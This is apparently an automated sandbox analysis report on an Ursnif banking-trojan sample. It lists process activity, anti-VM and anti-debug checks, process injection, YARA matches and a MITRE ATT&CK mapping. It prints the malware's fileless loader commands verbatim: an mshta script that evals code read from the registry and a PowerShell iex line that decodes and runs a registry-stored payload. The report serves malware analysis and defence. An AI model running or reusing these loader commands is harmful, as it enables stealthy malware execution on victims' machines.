Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\control.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\rundll32.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Source: C:\Windows\System32\control.exe

File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread delayed: delay time: 922337203685477

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 3072
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 6049

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.dll			Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.dll			Jump to dropped file

Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4360	Thread sleep count: 35 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4360	Thread sleep count: 59 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe TID: 4360	Thread sleep count: 40 > 30	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6336	Thread sleep time: -9223372036854770s >= -30000s

Source: C:\Windows\SysWOW64\regsvr32.exe

Last function: Thread delayed

Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B7E0BA RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree,	1_2_02B7E0BA
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B8888D lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,	1_2_02B8888D
Source: C:\Windows\SysWOW64\regsvr32.exe	Code function: 1_2_02B94FE1 lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,	1_2_02B94FE1

Source: C:\Windows\SysWOW64\regsvr32.exe

1_2_02B805EF

Source: mshta.exe, 0000001C.00000003.397674944.0000022FB9EA0000.00000004.00000001.sdmp

Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Source: C:\Windows\SysWOW64\regsvr32.exe

Process information queried: ProcessInformation

Jump to behavior

Anti Debugging:

Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process queried: DebugPort			Jump to behavior

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B75BD5 LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_02B75BD5

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Process token adjusted: Debug

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B916A5 ConvertStringSecurityDescriptorToSecurityDescriptorA,StrRChrA,_strupr,lstrlen,CreateEventA,RtlAddVectoredExceptionHandler,GetLastError,RtlRemoveVectoredExceptionHandler,

1_2_02B916A5

HIPS / PFW / Operating System Protection Evasion:

Compiles code for process injection (via .Net compiler)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File written: C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.0.cs

Jump to dropped file

Creates a thread in another existing process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread created: unknown EIP: AE131580

Maps a DLL or memory area into another process

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Section loaded: unknown target: unknown protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Show sources

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Thread register set: target process: 3292

Writes to foreign memory regions

Show sources

Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6D37B12E0			Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Memory written: C:\Windows\System32\control.exe base: 7FF6D37B12E0			Jump to behavior

Source: C:\Windows\System32\loaddll32.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c 'C:\Program Files\Internet Explorer\iexplore.exe'	Jump to behavior
Source: C:\Windows\SysWOW64\regsvr32.exe	Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\internet explorer\iexplore.exe C:\Program Files\Internet Explorer\iexplore.exe	Jump to behavior
Source: C:\Windows\System32\mshta.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\oywbpzxb\oywbpzxb.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\augdh01w\augdh01w.cmdline'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES3C64.tmp' 'c:\Users\user\AppData\Local\Temp\oywbpzxb\CSC2DF1E538346248FC93F32E43C7FD9A69.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user~1\AppData\Local\Temp\RES4E84.tmp' 'c:\Users\user\AppData\Local\Temp\augdh01w\CSCB69F8509801B4EEB877EE395DFB169E8.TMP'
Source: C:\Windows\System32\control.exe	Process created: C:\Windows\System32\rundll32.exe 'C:\Windows\system32\rundll32.exe' Shell32.dll,Control_RunDLL -h

Source: unknown

Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'

Language, Device and Operating System Detection:

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B804D7 cpuid

1_2_02B804D7

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,

1_2_00401B13

Source: C:\Windows\SysWOW64\regsvr32.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion InstallDate

Jump to behavior

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B8B585 CreateNamedPipeA,GetLastError,CloseHandle,GetLastError,

1_2_02B8B585

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_00401000 GetSystemTime,SwitchToThread,Sleep,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError,

1_2_00401000

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_02B87AFF RtlInitializeCriticalSection,RtlInitializeCriticalSection,memset,RtlInitializeCriticalSection,CreateMutexA,GetLastError,GetLastError,CloseHandle,GetUserNameA,GetUserNameA,RtlAllocateHeap,GetUserNameA,NtQueryInformationProcess,OpenProcess,GetLastError,CloseHandle,GetShellWindow,GetWindowThreadProcessId,CreateEventA,CreateEventA,RtlAllocateHeap,OpenEventA,CreateEventA,GetLastError,GetLastError,LoadLibraryA,SetEvent,RtlAllocateHeap,wsprintfA,

1_2_02B87AFF

Source: C:\Windows\SysWOW64\regsvr32.exe

Code function: 1_2_0040166F CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

1_2_0040166F

Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.347644155.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347681136.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.368377859.000000000510B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347573362.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347619571.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347469685.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347515510.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347664803.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347704274.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6388, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4496, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000001.00000003.347644155.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347681136.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.368377859.000000000510B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 0000001D.00000003.434755042.00000233EFC40000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347573362.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347619571.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347469685.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347515510.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347664803.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.347704274.0000000005288000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000003.433441444.0000000002BB0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.449546892.0000000002B70000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: powershell.exe PID: 6388, type: MEMORY
Source: Yara match	File source: Process Memory Space: regsvr32.exe PID: 4496, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts1	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Obfuscated Files or Information1	Credential API Hooking3	System Time Discovery1	Remote Services	Archive Collected Data1	Exfiltration Over Other Network Medium	Ingress Tool Transfer3	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	Valid Accounts1	Valid Accounts1	Software Packing1	LSASS Memory	Account Discovery1	Remote Desktop Protocol	Email Collection1	Exfiltration Over Bluetooth	Encrypted Channel12	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter12	Logon Script (Windows)	Access Token Manipulation1	DLL Side-Loading1	Security Account Manager	File and Directory Discovery3	SMB/Windows Admin Shares	Credential API Hooking3	Automated Exfiltration	Non-Application Layer Protocol4	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	PowerShell1	Logon Script (Mac)	Process Injection512	Rootkit4	NTDS	System Information Discovery45	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol5	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Masquerading1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Valid Accounts1	Cached Domain Credentials	Security Software Discovery21	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Access Token Manipulation1	DCSync	Virtualization/Sandbox Evasion4	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Virtualization/Sandbox Evasion4	Proc Filesystem	Process Discovery2	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue
Exploit Public-Facing Application	PowerShell	At (Linux)	At (Linux)	Process Injection512	/etc/passwd and /etc/shadow	Application Window Discovery1	Software Deployment Tools	Data Staged	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	Web Protocols	Rogue Cellular Base Station		Data Destruction
Supply Chain Compromise	AppleScript	At (Windows)	At (Windows)	Regsvr321	Network Sniffing	System Owner/User Discovery1	Taint Shared Content	Local Data Staging	Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol	File Transfer Protocols			Data Encrypted for Impact
Compromise Software Dependencies and Development Tools	Windows Command Shell	Cron	Cron	Rundll321	Input Capture	Permission Groups Discovery	Replication Through Removable Media	Remote Data Staging	Exfiltration Over Physical Medium	Mail Protocols			Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
